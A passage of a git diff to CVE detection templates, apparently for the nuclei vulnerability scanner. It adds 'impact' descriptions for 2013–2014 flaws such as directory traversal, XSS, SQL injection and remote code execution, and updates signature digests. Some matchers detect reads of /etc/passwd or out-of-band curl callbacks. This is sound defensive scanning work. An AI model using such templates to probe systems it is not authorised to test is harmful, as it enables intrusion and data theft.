4b0a00483046022100d8b211bbf2d055c923e844409e533f28eace705338e0568d7366a8f2e9c8edf9022100ffcf103a8fd7651cce24bfb0dad2fac7146dc0a1be8ab48a0af6184f3c5a57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e02f05197668a2896c4ce3329cfaa33626f88728c4b26081575c062dfa2793b02202da67d420e04a0893e7789fa280484696fae3e87c216e5c8035aa45364e2f2b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 911bd4082f..707d599fc7 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + impact: | + An attacker can read arbitrary files on the server. remediation: | Upgrade to a patched version of Xibo. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c58d020adab1b1dfd869b74002807b5e9a9ca787592efc85a821b51b6e1ca7002200f60351e13c43af53469514345318f4821ebddbfcb867645099ee962dcb86c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100866349d738228669609abe425094cd153a1465586d479ca9fec10db9a7c55c6b022100bb0fae43b502e3c8e6ef60a28d6c47c46d9144a35373d5a29573f694cafb7cb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 1868b18c60..1a97f266f0 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: @@ -53,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206dbbab28b5db438ede1d0ef39a4413883c23469116fec3a4dd469bf0aea9b6f902203d15d44466fa6aef6ff238b0c5506ddfd2913ce1bb78c9c4fa16a04e427d0a5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb01e00698300e21d7fd11d10a0bf78683b0c5f5f328e786164354303b69274b022100935646da48b55b5db44efc49b96a770beb700b40087946eb988e934c9fd4cf2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 46259a3fcd..f2bc6a6480 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -5,6 +5,8 @@ info: author: rubina119 severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability. reference: @@ -51,4 +53,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 4a0a004730450220291a98fd27d95cd20ab4c8ccc8b963594c4b98191fffaba69aea60935b679d4f022100997a0fe4ab10f1ce3290561c6493b20090995a89804aa48f6a64f09704570d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af34e7a9486944cdae869b27f5e277ef9ac9ccf9f3694aa8dbbc6231d81abc8602204e21dbc6719c5177611e0f4136f31ff3b46026159d00b25924d61f1f058214b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 869b6713d8..56e3304741 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cfc2f397e914759fa35d7f3b88d6589dec3bede98abc314ffa17397519907c602210092a7cc7211769e7091ae5cd20ffad9d80fff14bc9a8faf7812e4ac27ac42e7e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df40bf2354f82b69e8a76d390759c896a2c448d1d2b1cb84bd760147b05a307b022100b74dfb8e99555fef5e06aff38e619f27e81e3dc434c317680b93351c1957cfdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 99b592b3a6..808e595179 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: @@ -62,4 +64,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022032280c7a9d42721f188dec089c1ee99f5f68127ea5786903a21fbb207480e4ae022100e51e99eb751be529e78b5d77abf38f5461b361cae7ffb4be5feb19b11aca4ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bea72ccdcaf18fa5328ff124392c4b1d40521fa73d440d3e27d7d0cf1884f00c022040c286187a757d6197352db014b2918f506fa65d89d6fc40e0e226be12e31d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 035b5d24d4..788156ebc0 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + impact: | + An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b4a57b06aa557e7ea9ed17d4a7d15826d391fc2c21a83960acba0b05eae2955022100bf0c1d19aad3074a9b63fcaf3de8804a8dadc904d1cde41fdf6ccde3f8cb7ad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022045409433be7fe4dffc9d3bfcdade34b30b7d644fbb543aa4ced8a3b0e9075a94022100b697303a0592ced1eb79a26f42db2290e48c6f95bde12e36dfd1154a9c3507a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 7d9f6a32d5..3cf15beb09 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203b38c1f86652e3b47da1ff30382ff904a109850e88c3879f86338a3b02ef30de022042d77da62bf1e636a5399c26416f7b3b883be8e780a07e86c75cff77b455c5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec1ac8dd4ecf97532dc7d81827b73f01099fd3e1f104abcf31d5e1460d1f50d4022100b97d60ac30948ae48df5afdbba9358802b1be0d6ad69e6e497386080453a1da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index f0fad9ba91..ef02d73f39 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + impact: | + Remote code execution remediation: | Apply the latest firmware update provided by ZTE to fix the vulnerability reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ba6eab655a6a72dc0f5e22d7614c07e57763637c61bd9077a44045f2b9549e30022072305cbf914a878b878d37da93d1e59127e44bb4843dac9142c2cd86b165e799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a56607c8d1ec7cfd4719d48d9c7fa91e25869e904e929295fb180cd1ba872160022100c914c6b4fcd31ed17d817e7db1d5e08b6fddf7843b00c3275d66e27f480e4a37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index ff9a8d86b2..1caa0c73a1 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution remediation: | Upgrade to a patched version of Lighttpd or apply the necessary security patches reference: @@ -38,4 +40,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4a0a00473045022100890bbb222dab6e6077d699ba000931239a2a22675c5458d681ecff738f9cf6cd022003e1995604726148f1ad10ae858fe5f2f9cdf321e8d51b4cd21998663f7b0165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0c790e1cbbd16a33270523f27a14fcfe82c2f99b9cb6d04774121f8f44cccad022100b328c3e67f5f85bd158b7701623a9ec68f2aed71f07a280422f15db73aaad1c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index b968bc2120..4cb056a41d 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system. remediation: | Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability. reference: @@ -62,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1d97f4e572f4991277c3398217adc384a1c64bc9f2ee889c753ccde728996920221009cca24095bebb03123bcadfa95187ec3477a9e594914639ab93c860d7d30221f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203921743780724eb52c7bb0eb87f3d059097d2031b14f0ff098024e481f46880d022100a81e349caaee574d24461d7caf9a93dd9689fa550db17f0cb90b75c1d8e579ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index eb286355f3..b0bf85d474 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: Upgrade to v4.0 or later. reference: - https://www.exploit-db.com/exploits/44687 @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207ba0e73bc0ce934fe9ebb08cde6954c20a59e182fca6de51908fa368c743ae14022100d6dbc979178d3969162cafc3670a26a7bb6484f8b39bbc733c9a3b4413e2e107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c73948411560103b8f5c49014a2d1fff0ed14ddb5d4496f5cf0386ed7257d0e02206eefceed30f5e37d37d7999b4b123ecdfd39fb3cdf636ce94634a393478d6e25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 7856db4961..4a8fd9bfc1 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + impact: | + An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. reference: - https://www.kb.cert.org/vuls/id/774788 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f2be013d1c42d4b50c06f2ed2da750c036e90d5c3727dc1de8c75032583ad05002207046f1a8a584c0535846644c9b97011c4a6123688982b6a7d3f34bba1048ff66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026d2b631fa942f9ee77f39d73bfdb3d19e300d528de9d66baa325b64e2577de0022023564b7c13017538b414f940c6f7292a043ec7a7398b7a13991edaca60bd9daa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 8ae057065f..192fc321cd 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + impact: | + Allows remote attackers to execute arbitrary code on the affected system remediation: | Upgrade to a patched version of ElasticSearch reference: @@ -69,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f577b5b343297961f96e7ae627c542a022d80387bb925978a1416e6c91c37ccf022100d1070f10c65ebfc0801549f3e8b5bdec8f4ba85867d562841cfc38ef67c655d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8ca32574dd1fadd9b74d9637ead80fe58001ea1f88c106c2bfdd3f56500029a022051065022f16e3bc022eb441be88bfcd018ff0fd07f36d969a9d67853867fc978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 8118fcc965..8aba1bbc10 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network. remediation: | Apply the latest firmware update provided by Seagate to patch the command injection vulnerability. reference: @@ -42,4 +44,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a00473045022100a666968c172582af935ab58097b0f389fe79771540a9c615f7e6eeaaa77081020220408d8f4d58dc6972cbb5714f79778cfe0c8e567ce616ed5a53bd8ad3a75dec1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b3de4b1566a99da648abc07da3b94ebb1860817b84793793d316480d01c7603022100a510f7edb5ed03f87310a9adebb01d4093ee3c3ce11da529ebe95d058998c325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 3410bb45a9..30ed9237db 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database. remediation: Upgrade to Drupal core 7.32 or later. reference: - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql @@ -50,5 +52,4 @@ http: - type: status status: - 500 - -# digest: 4b0a00483046022100b094a161539cda73a1fa7ffc6ad92c2a3d2c2aac71febb2e23b31add297e6ad7022100f18cac029bb2350c7c535eb3f6916a58404a976369d02a2508a7f55c5ef55728:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022019ad60102b0034cd9c4d9e39c2d9c0c3c811fc44980d37c077d538b6994da157022100ed831a5b94e4b5149514216eb9d04f4830ebd68ad61fde769efb3d379b4b80f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index d60117e642..56201c5447 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9c6f41ce1209254da302f99b3fd50eb51788681bb3ab134023f69191d1949c0022100b38f77e8e0b59aafa34c99254c974a867229356c7246ec576b3ef2902f3edf87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad1ca8124c95e2703cbb3cba50f3915085260371306caf5a373714b7a86f7b7c02200c1bc9db87baee85222934f05a0ec6eed0bdc9ae6370d1f5052eaa16ea09f85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index b860fa12a1..240a63cf48 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -4,9 +4,11 @@ info: name: Oracle Weblogic - Server-Side Request Forgery author: princechaddha severity: medium - description: | - An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. - remediation: Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability + description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability reference: - https://www.oracle.com/security-alerts/cpujul2014.html - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207016a1bb2c1292cfa19e80b800f0be023d04307cc0d2726810278e4216525fc6022024a26e7bf609dceb719dc4d68120367c53d3a306d98bd58a83e7223619ffaf23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a40b5fed795b018d009f79227d028b7ed18bab2a342bd3510ecb3f147227e1e02205fefdc746fb4b81255fe35e0b17becc7d8b5d01c9e8798116d55c26056552a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 917f532fcf..1c1320c4c3 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100859481bdd9b5a30d7f3a6927e35509ffd3a9764216237304ecfdac87ab930d2102200fece8b5c38a5c66599ac04458f0a084035444b052dd143b136ea59a79ba52c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f239af02dc3d7a82f42336509f9bfa2152d16e586f60ef223df03ac864cb3f5022100a83dd297b3d178a07579b11715ac2b258ef079b469c99a5399a23c3513c26eb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index f2be024427..07f581a9c9 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220213930c6a99b15ee189b56653c24ec5b066d507da0a9ee1952163d188741bd8f02200d6ddfda7e9d6effac0543ee2048630e46e11a66c015b9b9a83d63c48e8cd834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b748ec3f080c43508a6e4b86ccae498e26c3614f2f06acc017d568fb99cdfb8402206569d13cb86a37da3dfa4744e75680fe26e2dd70d3391c8bf1488d20bd54022d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 3790a9b1c0..ea96f726a5 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022007a52ee36df3f6f3c98eea6040d4c81debbdafbae1081122b4721140de2fd7f8022100bd3be8ac12f0cc19795e8d3b5fae95495665bbc39cdf744ca1e7837f9d6cb974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220580487d990fbf72c8ad3e2af7c2ae2b1d78dd55f71719677cc110f2130109a6c0221008209a0edafca0fb9da9ecb63df77fb96399a3c7328cc83cb7169a6ac62fc13c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 68010d805a..bb26d88096 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207832dde72d78ed46425bdca6d18335c62ac522b898166c9b650e7a6081bfca29022100a1caa21f95817d22ca68c129e60545dde0909e3522eb39882238810efa0ea2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094c57de15f97fca4490843b947b7b690e1aa66fd6313ae1fc8efb8d3dda0e38102210099a8ad854656ce1b02f2890a1a3817915ef09aa5545cd42c952391d7304c75ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 51e86b129c..7e927c78d9 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b0a6aadbdc372ebcbbd9239208d333ffcbb2244f1786a283f73103f9f0b50be0221009b621f690dadbafd005804582c3cc07f89362fe1afce06fbf8897826d9b84c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220078759a06ea361276eb0cfd93bdd686cc6a0d4efa87b282c90531a3f9ac199e402204e90184620d595a421ed934c84affd49e89d27945d56eeb33bdd981da2c147fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 5923c1b605..facf173194 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via crafted shortcode parameters, leading to potential session hijacking, defacement of web pages, or theft of sensitive information. remediation: | Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220551c720843bca8770909340fa644703ad667a0131e46325c82ba14bf35b68a6f022100868bb25c84d2cb621c014928d51572f693937d19cf43cad832dc6b5d4296b9c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220674dc3985feafe800dab520f51e8b6a033ee9f73f3b00c39b64ad2e95577664b022022ff4f244837aa3f3778ec97181d38f45697688f3f763adf29b40ae0aa412080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index fa84a45c2b..1f24b30292 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting 